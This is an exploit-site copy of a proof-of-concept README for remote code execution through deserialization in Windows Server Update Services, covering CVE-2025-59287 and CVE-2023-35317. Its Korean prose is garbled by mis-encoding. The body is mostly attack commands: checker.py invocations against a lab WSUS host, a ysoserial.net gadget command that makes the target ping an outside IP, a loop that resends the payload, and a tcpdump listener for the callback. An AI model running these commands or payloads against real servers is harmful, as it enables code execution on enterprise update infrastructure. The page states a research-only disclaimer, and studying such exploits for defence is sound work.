## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M507-CVE-2025-59287-POC
# CVE-2025-59287 / CVE-2023-35317 PoC
CVE-2025-59287 λ΄λΆ: WSUSμ SoapFormatter RCE: https://shellcode.blog/wsus-cve-2025-59287-investigation/
μ΄ μννΈμ¨μ΄λ μμνκ² νμ μ°κ΅¬μ ν¨κ³Όμ μΈ λ°©μ΄ κΈ°λ² κ°λ°μ λͺ©μ μΌλ‘ μ μλμμΌλ©°, λͺ
μμ μΌλ‘ μΉμΈλ κ²½μ°λ₯Ό μ μΈνκ³ μμ€ν
μ 곡격νλ λ° μ¬μ©ν μλκ° μμ΅λλ€. νλ‘μ νΈ μ μ§κ΄λ¦¬μλ μ΄ μννΈμ¨μ΄μ μ€μ©μ λν΄ μ±
μμ μ§μ§ μμ΅λλ€. μ±
μκ° μκ² μ¬μ©νμΈμ.
## μ¬μ©λ²
νμ νλκ·Έ:
* `--target-url` β λμ WSUS μλ² κΈ°λ³Έ URL (μ: `http://WIN-246JC0TE3BB.vuln.local:8530`)
* `--cve` β `CVE-2023-35317` λλ `CVE-2025-59287` μ€ νλ
μ ν νλκ·Έ:
* `--dns-name` β SOAP μμ²μ μ¬μ©λλ ν΄λΌμ΄μΈνΈ DNS μ΄λ¦ (κΈ°λ³Έκ°: `bugcrowd.local`)
* `--random` β `--dns-name` μμ μμμ νμ λλ©μΈμ λΆμ¬ κ° μ€νμ΄ μ ν΄λΌμ΄μΈνΈλ‘ 보μ΄κ² ν©λλ€
* `--payload` β μ¬μ©μ μ μ base64 μΈμ½λ© ysoserial νμ΄λ‘λ. μλ΅νλ©΄ μ νν `--cve`μ λν΄ λ΄μ₯ νμ΄λ‘λκ° μ¬μ©λ©λλ€
* `--debug` β μμΈ λλ²κ·Έ λ‘κΉ
νμ±ν (`[DEBUG]` μ€)
## CVE-2025-59287
1. `python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random`
> 
## μλ νΈλ¦¬κ±° β CVE-2023-35317
1. (μ ν μ¬ν) λ΄μ₯ νμ΄λ‘λλ₯Ό μ¬μ©νμ§ μμΌλ €λ©΄ Ysoserial.Netμ μ¬μ©νμ¬ νμ΄λ‘λλ₯Ό μμ±ν©λλ€ (λλ λ΄μ₯ νμ΄λ‘λμ μμ‘΄ν©λλ€).
2. μ€ν: `python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random`
3. WSUS μ½μμ μ½λλ€
> 
## μλ νΈλ¦¬κ±° β CVE-2023-35317
1. `./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64` (λλ `--cve CVE-2023-35317`μ λν΄ λ΄μ₯ νμ΄λ‘λμ μμ‘΄ν©λλ€)
2. `for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done`
3. 1~3λΆ κΈ°λ€λ¦¬λ©΄ μλΉμ€ νλ‘μΈμ€μμ μ€νλ©λλ€.
4. ICMP μ°κ²°μ λͺ¨λν°λ§ν©λλ€: `sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done`
> 